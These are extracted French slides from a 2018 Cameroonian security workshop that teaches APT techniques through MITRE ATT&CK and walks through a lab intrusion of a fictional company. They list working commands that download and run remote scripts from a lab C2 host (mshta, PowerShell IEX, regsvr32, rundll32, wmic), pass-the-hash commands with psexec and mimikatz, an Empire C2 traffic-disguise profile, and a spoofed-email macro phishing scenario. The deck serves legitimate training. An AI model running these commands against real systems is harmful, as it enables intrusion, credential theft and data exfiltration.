This amazing and unique event has taking place last saturday (29 Sept 2018) and has allowed cybersecurity enthusiasts from several regions of the Cameroon to meet and boost their capacity around a theme worthy of interest: APT type attacks.
During this workshop, the main focus was on exploring the MITRE approach with its ATT&CK framework for adversaries simulation, APT simulation.
2. ABENE Bertin,
Spécialiste en Cybersécurité
Responsable Sécurité Système d’Information - *
Codeur | Bloggeur |Formateur
@thebenygreen
@237hackers @eyesopsec
http://gacksecurity.blogspot.com
Trainer
Auteur de Beefstrike
2012 - 2014 2015 2016
#237HackersWorkshop
Session 01 : Cyberattaques avancées type APT
Beefstrike utilise CORTANA, un projet né du programme Cyber Fast Track DARPA du Département de la Défense des États-Unis
https://opencatalog.darpa.mil/CFT.html
https://github.com/benyG/Beefstrike/
>whoami
2
3. Avertissement !
#237HackersWorkshop - Session 01 : Cyberattaques avancées type APT
Au cours de cet atelier, les participants apprendront les
méthodes utilisées dans le cybercrime et pourrons même en
reproduire avec succès. Plus précisément certaines des
attaques répertoriées dans le Framework MITRE ATT&CK.
Le but de cet atelier est de permettre aux participants de mieux
défendre les systèmes placés sous leur responsabilité ou ceux
de leurs clients. De participer de ce fait grâce à leur maîtrise
des risques, à la construction d’un cyber espace plus sûre.
Les participants s’engagent à n’utiliser les informations
communiquées dans cet atelier que dans un cadre strictement
légale et à des fins conformes à l’éthique.
La responsabilité du formateur ne sera en aucun cas engagée si
certains participants venaient à déroger à cette clause ayant
validé leur participation.
3
4. PLAN
#237HackersWorkshop - Session 01 : Cyberattaques avancées type APT
1. Introduction
2. Cyberattaque, Quesaco ?
3. Cyberattaques ciblées
4. Cyberattaques avancées (APT)
5. Référencement des APT
6. MITRE ATT&CK Framework
7. Schémas tactique standard
8. Exploration des techniques APT
9. ATELIER PRATIQUE :
Simulation d’une attaque type APT
10. Protection contre les cyberattaques APT
11. Conclusion
Niveau de complexité
4
5. Cyberattaque, Quesaco ?
#237HackersWorkshop - Session 01 : Cyberattaques avancées type APT
Attaque active : acte (malveillant) modifiant
ou altérant les ressources ciblées par l’attaque
(atteinte à l’intégrité, à la disponibilité et à la
confidentialité des données) .
Loi du 21/12/2010 relative à la cybersécurité et à la
cybercriminalité au Cameroun
18 million de nouveau malware en 2016 soit 200 000 par jour
Panda Labs
4000 Attaques de Ransomware par jour
Computer Crime & Intellectual Property Section (CCIPS)
Motivations des cyberattaques - Juin 2018
-> https://www.hackmageddon.com/2018/07/23/june-2018-cyber-attacks-statistics/
QUELQUES CHIFFRES
5
6. Cyberattaque ciblée
#237HackersWorkshop - Session 01 : Cyberattaques avancées type APT
Une cyberattaque peut générer une crise majeure pouvant
remettre en cause la survie même de l’entreprise.
Principales conséquences :
Financières
Juridiques
Réputationnelles
Humaines
Cyberattaque, Quesaco ?
Les impacts
https://www.lamontagne.fr/clermont-ferrand/economie/commerce-artisanat/2017/09/22/victime-d-un-
piratage-informatique-la-societe-clermont-pieces-va-fermer-boutique_12561803.html
6
National Cyber Security Alliance révèle que:
+60% des PME attaque ciblée cessent leurs activités après 06 mois.
8. Cyberattaque ciblée
#237HackersWorkshop - Session 01 : Cyberattaques avancées type APT
Attaque Ciblées / Targeted attack
Cyberattaque ayant la particularité de ne pas viser de cible aléatoirement. Au
contraire, elle vise une cible précisément sélectionnées pour des raisons en relation
avec les objectifs de l’attaque
Phase clé de sélection RECONNAISSANCE
Activistes Etats Réputation Basiques
Entreprises Entreprises Vol des données Professionnelles
8
9. Cyberattaque ciblée
Schémas tactique des cyberattaques ciblées
#237HackersWorkshop - Session 01 : Cyberattaques avancées type APT
Recon
Weaponize
Delivery
Exploitation
Installation
Command
& Control
Actions
Cyber Kill Chain
Lockheed Martin
Cybersecurity kill chain is a framework developed by Lockheed Martin for identification and
prevention of cyber intrusions activity. As attacks may occur in stages, you as defender can
put optics and controls to detect or disrupt the entire process.9
10. Cyberattaque avancée ( type APT )
#237HackersWorkshop - Session 01 : Cyberattaques avancées type APT
Advanced Persistent Threat
Menace Persistante Avancée
Menace de par son
caractère dangereux
pour la cible
Dans toutes les attaques APT.
L’objectifs est de maintenir une
présence furtive long termes
au cœur du système cible.
Les outils et techniques
utilisées trahissent la
bonne organisation, les
compétences élevées des
attaquants et les moyens
financiers conséquents
mis à disposition pour
l’execution de l’attaque.
L'APT utilise un ensemble évolutif de tactiques, de techniques et
de procédures (TTP) pour établir et maintenir une présence dans
l'infrastructure informatique de la cible et exploiter ce potentiel
pour exfiltrer d'importants volumes d'informations sensibles,
corrompre les informations critiques ou dégrader les capacités
10
13. MITRE ATT&CK Framework
#237HackersWorkshop - Session 01 : Cyberattaques avancées type APT
MITRE a mis au point (ATT&CK ™), une base de connaissances et
un modèle pour le comportement des cyber-adversaires, reflétant
les différentes phases du cycle de vie de l’adversaire et les plates-
formes qu’ils sont censés cibler.
Technique Description
Persistence
Privilege Escalation
Defense Evasion
Credential Access
Discovery
Lateral Movement
Execution
Collection
Exfiltration
Command and Control
(C2)
Techniques de présence persistante sur un système compromis
Techniques permettant à l'adversaire d'obtenir un niveau plus élevé d'autorisations
Techniques que les adversaires utilisent pour échapper à la détection ou l’éviter
Techniques permettant d'accéder ou de contrôler les informations d'identification des
systèmes, du domaine ou des services
Techniques permettant à l'adversaire d'acquérir des connaissances sur le système et le
réseau interne
Techniques permettant à un adversaire d'accéder et de contrôler des systèmes distants
au sein du réseau cible
Techniques permettant l'exécution de code contrôlé par l'adversaire sur un système
local ou distant
Techniques utilisées pour identifier et collecter des informations
Techniques qui aident l'adversaire à exfiltrer des fichiers et les données d'un réseau cible
Techniques représentant la manière dont les adversaires communiquent avec les
systèmes sous leur contrôle au sein d'un réseau cible
https://attack.mitre.org/wiki/Main_Page
13
14. APT: Schémas tactique standard
#237HackersWorkshop - Session 01 : Cyberattaques avancées type APT
14
Build social
Engineering
Attack scenario
15. Installation de l’infra C2
#237HackersWorkshop - Session 01 : Cyberattaques avancées type APT
Modèle d’infra C2
Segmenter les composantes fonctionnelles de
l’infrastructure en couche offre la flexibilité et la
résilience face aux actions préventives
Empêche l'identification du cœur de l’infra et sème la confusion
Redirection Layer
Utilisé essentiellement pour la phase Delivery
Phishing Layer
Héberge la charge offensive qui attaquera les cibles
Payload Delivery Layer
Contrôle des opérations
Control Layer
victime
Attaquants 15
16. Installation de l’infra C2
#237HackersWorkshop - Session 01 : Cyberattaques avancées type APT
Communication: Channels et Profiles
Les channels sont les protocoles+services utilisés pour le trafic vers le
C2. En générale le choix vise à éveiller le moins de suspicion
(exple: https+twitter)
Les profiles C2 permettent à l’attaquant d’imiter un channel, et ainsi
déterminer comment le trafic vers le C2 sera vu sur le réseau.
Dès lors on a 02 options avec les profiles:
1. Faire passer le trafic pour légitime en utilisant l’empreinte réseau des applications metier
utilisées sur le réseau cible (exemple: Exchange Online, Sage Online, …) Red Teaming
2. Simuler l’empreinte réseau d’une menace spécifiques connues pour évaluer la réponse de
nos défense Adversary Emulation/Simulation
16
Trafic généré par un sample du bot Zeus
https://digital-forensics.sans.org/blog/2014/03/31/the-
importance-of-command-and-control-analysis-for-
incident-response
17. Recon
#237HackersWorkshop - Session 01 : Cyberattaques avancées type APT
OSINT SCAN
Scan des ports
Enumération des
services
Scan de vulnérabilité
Sources OSINT
• Moteurs de
recherche
• Réseaux sociaux
• Sites d’annonces
• …etc
• Nom des cibles clé
• Email
• Téléphone
• Intérêts
• etc
• IP
• Services
• Applications
• Vulnérabilités
• Etc
C’est de loin l’étape la plus importante
Non-intrusif
Intrusif
Utilisateurs, Organisations, …
data
Big data
17
18. Tactique: Weaponize
#237HackersWorkshop - Session 01 : Cyberattaques avancées type APT
Binder : Ajouter un fichier exe dans un fichier exe
Fichier Office piégé avec macro
Watering hole
Exploits embarqués (exe, page web, …)
etc
18
Techniques
19. Tactique: Execution
#237HackersWorkshop - Session 01 : Cyberattaques avancées type APT
Techniques
- CMSTP: executer du code via les fichiers INF [T1191]
cmstp.exe C:eo.inf /au
- DDE : usage de la fonctionnalité Dynamic Data Execution d’Office [T1173]
Insert-> Quick Parts-> Field -> {DDEAUTO c:windowssystem32cmd.exe "/k calc.exe"}
- MSHTA[T1170] :
mshta.exe javascript:a=(GetObject("script:http://192.168.43.203:5000/mshta/eo.sct")).Exec();close();
- POWERSHELL [T1086] :
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('http://192.168.43.203:5000/psh/eo.ps1’)
- REGSVR32 [T1117] : regsvr32.exe /s /u /i:http://192.168.43.203:5000/cmstp/eo.sct scrobj.dll
19
20. Tactique: Execution
#237HackersWorkshop - Session 01 : Cyberattaques avancées type APT
Techniques
- RUNDLL32 [T1085] :
• Rundll32.exe javascript:"..mshtml,RunHTMLApplication
";document.write();GetObject("script:http://192.168.43.203:5000/rundll32/eo.sct").Exec();“
• Rundll32 SHELL32.DLL,ShellExec_RunDLL "calc"
- SCHTASKS [T1035] : SCHTASKS /Create /SC ONCE /TN eotask /TR calc /ST 12:54
- WMI [T1047]: WMIC process call create "cmd.exe /c calc“
WMIC /node:ComputerName process call create “cmd.exe /c calc.exe”
wmic os get /format:"http://192.168.43.203:5000/xsl/eo.xsl"
- WINRM : winrm qc -q & winrm i c wmicimv2/Win32_Process @{CommandLine="calc"}
- WSCRIPT 20
23. Tactique: Lateral Movement
#237HackersWorkshop - Session 01 : Cyberattaques avancées type APT
Techniques
- PSEXEC [T1002] :
psexec /accepteula 192.168.10.1 -s cmd.exe
(Run cmd.exe on the remote box as the SYSTEM user account)
psexec /accepteula ip -u domainuser -p lm:ntlm cmd.exe /c dir c:Progra~1
(Run cmd.exe on the remote system using the lm:ntlm password hash - aka pass the hash)
- MIMIKATZ [T1191] : mimikatz # sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}
- WMI [T1191] :
23
24. Tactique: Credentials access
#237HackersWorkshop - Session 01 : Cyberattaques avancées type APT
Techniques
- CREDENTIALS DUMPING [T1003] : Extraction des Hash des mots de passe
Extraction des mots de passe en clair
- KEYLOGGER: Enregistrement des frappes clavier
- PHISHING: incitation frauduleuse à transmettre des informations
24
27. Tactique: Compression & Exfiltration
#237HackersWorkshop - Session 01 : Cyberattaques avancées type APT
Techniques
- ZIP
- RAR
- etc
Techniques
- Exfiltration via service HTTP
- Exfiltration via serveur FTP
- Exfiltration via des API de service Web
(Github, Pastebin, …etc)
27
Exfiltration
Compression
29. Scenario du LAB
#237HackersWorkshop - Session 01 : Cyberattaques avancées type APT
L’entreprise EMIZOPLAYA CORP exerce ses activités dans le domaine de la logistique
et elle se porte plutôt bien depuis plus de 05 ans. Son chiffre d’affaire ne cesse de
croître.
EMIZOPLAYA CORP s’est récemment vu attribuer un important marché n7030 d’une
valeur de 530 million.
29Threat actor : APT98
Vous allez jouer le rôle de cette entité
Pour des motivations X et Y une entité a été contactée pour établir une
présence durable au sein du système d’information de l’entreprise
EMIZOPLAYA CORP à fin d’obtenir des données liés à ses succès et à
l’attribution du marché n7030
30. Configuration du Réseau du LAB
#237HackersWorkshop - Session 01 : Cyberattaques avancées type APT
30
Serveur
- DC
- Files
Antoine ZOPLAYA (DG)
Nom PC: cli02
IP: 192.168.10.22
Jessica MAMU (CP)
Nom PC: cli01
IP: 192.168.10.21
C2 infra - APT98
autres
APT98 Team
(Internet)
Céline FOTSO (Sysadmin)
Nom PC: DC01
IP: 192.168.10.1
Domain: emizoplaya.com
192.168.10.203
192.168.43.203
Internet virtuel
Wifi: Eolab
192.168.10.10
NAT
Naviguons pour tester
les accès aux fichiers
32. Empire PowerShell
#237HackersWorkshop - Session 01 : Cyberattaques avancées type APT
Les Listeners sont les canaux qui reçoivent des connexions de notre machine cible.
Les stagers sont des charges « explosives » utilisées pour créer une connexion avec le C2
Les agents sont les connexions créé avec les machines attaquées avec succès.
Les modules sont des commandes spécifiques exécutable sur une machine victime
Listeners Stagers
Agents
32
Modules
Début
victime
Results
33. Setup C2
#237HackersWorkshop - Session 01 : Cyberattaques avancées type APT
GET request URI | User Agent | Header #1Format de profile :
33
Changer de profile
Supprimer la DB empire.db, editer là et redémarrer empire exemple profile BING search :
set DefaultProfile
/owa/mail/inbox.srf,/owa/mail/drafts.srf,/owa/mail/archive.srf|Mozilla/5.0
(Windows NT 6.1; WOW64; Trident/7.0; yie11; rv:11.0) like Gecko|Accept:*/*
set ServerVersion "Microsoft-IIS/8.5«
page = """<!DOCTYPE html><html > … </html> """
Modifier la réponse HTTP par défaut en éditant le fichier : lib/common/http.py
34. Scenario
#237HackersWorkshop - Session 01 : Cyberattaques avancées type APT
EXECUTION DE LA PHASE RECON:
Site web
linkedin
Site annonce
twitter intérêt
contact
Social
engineering
scenario
34
Nom CP
Cpte twitter Rolex
Nom CP Contact CP
Résultats
Jessica MAMU BEKOSSI
Employé à EMIZOPLAYA
Chef de Projet à EMIZOPLAYA CORP
Diplômé de l’ESSEC, Certifié PMP
Passionnée de ROLEX
Twitter: https://twitter.com/jessmak18
Contact: jessmamu02@yahoo.fr
35. Scenario
#237HackersWorkshop - Session 01 : Cyberattaques avancées type APT
WEAPONIZING PHASE :
Un fichier excel avec une macro malveillante
qui établi la connection initiale avec le C2
35
Construction du scénario d’ ingénierie sociale
Jessisa MAMU BEKOSSI = Cible
La maison ROLEX contacte JESSICA pour l’informer de sa sélection pour participer
gratuitement au lancement du programme « Rolex Elite Fans »
Qui a pour but de permettre aux Fans de la marque de montre luxe de participer au
choix des montres qui apparaitront sur le catalogue de l’année 2019.
Il est précisé qu’aucune information personnelle ne sera demandée
aux participants à ce programme
DELIVERY PHASE :
Service de email spoofing : https://emkei.cz/ Bill
Mosse, un responsable de chez ROLEX envoi le
fichier
bill.mosse@rolex.com
36. Scenario
#237HackersWorkshop - Session 01 : Cyberattaques avancées type APT
DEFENSE EVASION PHASE:
- Obfuscation du code
- Modification du profile C2
- Bypass Firewall usage port 80
36
Techniques
Résultats
On observera aussi par la suite
37. Scenario
#237HackersWorkshop - Session 01 : Cyberattaques avancées type APT
DISCOVERY PHASE:
On veut connaître:
- Nom machine et Compte utilisée
- Les machines en présence
- Les utilisateurs
- Les partages
- Les services
- Les contrôleurs de domaine
37
Hostname + Whoami
Aprscan
Invoke-DCSync
Share_finder + Get_ChildItem
Portscan
Get_domain_controller
Commandes/Techniques
Résultats
Session: jmamu - Session non privilégiée
Machines présentes: 192.168.10.21, 22, 1
Domaine: emizoplaya.com
DC: dc01.emizoplaya.com
Utilisateurs: jmamu, cfotso, azoplaya, mmbondo, pouedraogo, …
Partages: 192.168.10.1Business
38. Scenario
#237HackersWorkshop - Session 01 : Cyberattaques avancées type APT
PRIVILEGES ESCALATION PHASE:
- Check admin state
- bypassUAC_eventviewer
Nouvel agent:
- Re-check admin state
- Whoami
- Rename new agent
38
Commandes/Techniques
Résultats
Nouvelle session: jmamu - LOCAL PRIVILEGIEE
39. Scenario
#237HackersWorkshop - Session 01 : Cyberattaques avancées type APT
PERSISTENCE PHASE:
- Registry method (application)
- WMI method (juste un coup d’œil)
39
Techniques
Résultats
Après redémarrage, team APT98 conserve l’accès à la cli01, compte non privilégié
Mot de passe en claire + HASH pour jmamu et cfotso
CREDENTIAL ACCESS PHASE:
- Logonpasswords
Commandes
40. Scenario
#237HackersWorkshop - Session 01 : Cyberattaques avancées type APT
LATERAL MOVEMENT PHASE:
- InvokeWMI (HASH: copier-coller cfotso , CIBLE: 192.168.10.22)
Nouvel agent:
- Hostname
- rename agent
- Check admin state
- Persistence: registry
- Get_loggedon
- logonpasswords
40
TechniquesCommandes
Résultats
Prise de contrôle de Nouveaux postes: cli02, dc01
Session locale PRIVILEGIEE
Installation de la persistence sur cli02 et dc01
Obtention des mots de passe en clair + HASH du compte du DG: azoplaya
Répétion sur dc01.emizoplaya.com
41. Etat d’avancement
#237HackersWorkshop - Session 01 : Cyberattaques avancées type APT
41
Serveur
- DC
- Files
Antoine ZOPLAYA (DG)
Nom PC: cli02
IP: 192.168.10.22
Jessica MAMU (CP)
Nom PC: cli01
IP: 192.168.10.21
C2 infra - APT98
autres
APT98 Team
(Internet)
Céline FOTSO (Sysadmin)
Nom PC: DC01
IP: 192.168.10.1
Domain: emizoplaya.com
192.168.10.203
192.168.43.203
Internet virtuel
Wifi: Eolab
192.168.10.10
NAT
42. Scenario
#237HackersWorkshop - Session 01 : Cyberattaques avancées type APT
COLLECTION PHASE:
Commande
- Get-ChildItem
Résultats
Le dossier projet a été identifié comme dossier à forte valeur sensible.
Ce dossier a été compressé et exfiltré vers le C2
COMPRESSION PHASE:
Techniques
- Zip Folder
EXFILTTRATION PHASE:
Techniques
- File Upload via HTTP
1 Mois plus tard Antoine Zoplaya parti en congé, effectue son retour et réouvre sa session